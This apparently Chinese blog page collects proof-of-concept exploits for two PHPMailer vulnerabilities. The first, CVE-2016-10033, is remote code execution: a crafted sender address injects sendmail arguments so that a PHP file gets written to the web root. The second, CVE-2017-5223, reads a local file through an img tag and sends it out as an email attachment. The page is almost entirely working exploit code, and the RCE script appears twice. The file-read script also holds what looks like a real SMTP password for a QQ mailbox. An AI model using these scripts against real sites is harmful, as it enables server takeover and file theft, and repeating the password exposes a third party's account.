PHPMailer命令执行及任意文件读取漏洞POC

摘要

漏洞POC： <?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker/] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == [some"@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. The resulting file will contain the payload passed in the body of the msg: <<< --b1_cb4566aa51be9f090d9419163e492306 <<< Content-Type: text/html; charset=us-ascii <<< <<< <?php phpinfo(); ?> 09607 <<< <<< <<< <<< --b1_cb4566aa51be9f090d9419163e492306-- See the full advisory URL for details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = '"attacker/" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'; $msg_body = "<?php phpinfo(); ?>"; // ------------------ // mail() param injection via the vulnerability in PHPMailer require_once('class.phpmailer.php'); $mail = new PHPMailer(); // defaults to using php "mail()" $mail->SetFrom($email_from, 'Client Name'); $address = "[email protected]"; $mail->AddAddress($address, "Some User"); $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!/n"; } PHPMailer任意文件读取漏洞分析（CVE-2017-5223）

漏洞编号： CVE-2017-5223

影响版本： PHPMailer <= 5.2.21

漏洞级别： 高危

漏洞POC：根据作者的POC改了几行，使其适用于qq邮箱

PHPMailer 命令执行漏洞(CVE-2016-10033)

漏洞编号：CVE-2016-10033

影响版本：PHPMailer< 5.2.18

漏洞级别： 高危

漏洞POC：

<?php /*  PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)  A simple PoC (working on Sendmail MTA)  It will inject the following parameters to sendmail command:  Arg no. 0 == [/usr/sbin/sendmail]  Arg no. 1 == [-t]  Arg no. 2 == [-i]  Arg no. 3 == [-fattacker/]  Arg no. 4 == [-oQ/tmp/]  Arg no. 5 == [-X/var/www/cache/phpcode.php]  Arg no. 6 == [some"@email.com]  which will write the transfer log (-X) into /var/www/cache/phpcode.php file.  The resulting file will contain the payload passed in the body of the msg:  <<< --b1_cb4566aa51be9f090d9419163e492306  <<< Content-Type: text/html; charset=us-ascii  <<<  <<< <?php phpinfo(); ?> 09607 <<<  <<<  <<<  <<< --b1_cb4566aa51be9f090d9419163e492306--  See the full advisory URL for details.  */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker/" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';  $msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php');  $mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name');  $address = "[email protected]";  $mail->AddAddress($address, "Some User");  $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";  $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo;  } else { echo "Message sent!/n";  }

PHPMailer任意文件读取漏洞分析（CVE-2017-5223）

漏洞编号： CVE-2017-5223

影响版本： PHPMailer <= 5.2.21

漏洞级别： 高危

漏洞POC：根据作者的POC改了几行，使其适用于qq邮箱

<?php  #Author:Yxlink   require_once('PHPMailerAutoload.php'); $mail = new PHPMailer(); $mail->isSMTP(); $mail->Host = 'smtp.qq.com'; $mail->Port = 465; $mail->SMTPAuth = true; $mail->Username = [email protected]';  //qq邮箱 $mail->Password = 'zsuhxbmsaioxbcgb';//申请配置邮件客户端获取到的16位密码和qq密码不一样 $mail->SMTPSecure = 'ssl';     $mail->CharSet  = "UTF-8"; $mail->Encoding = "base64";    $mail->Subject = "hello"; $mail->From = "[email protected]";  $mail->FromName = "test";     $address = "[email protected]"; $mail->AddAddress($address, "test");    $mail->AddAttachment('test.txt','test.txt'); $mail->IsHTML(true);  $msg="<img src='D://1.txt'>test"; $mail->msgHTML($msg);    if(!$mail->Send()) {   echo "Mailer Error: " . $mail->ErrorInfo; } else {   echo "Message sent!"; } ?>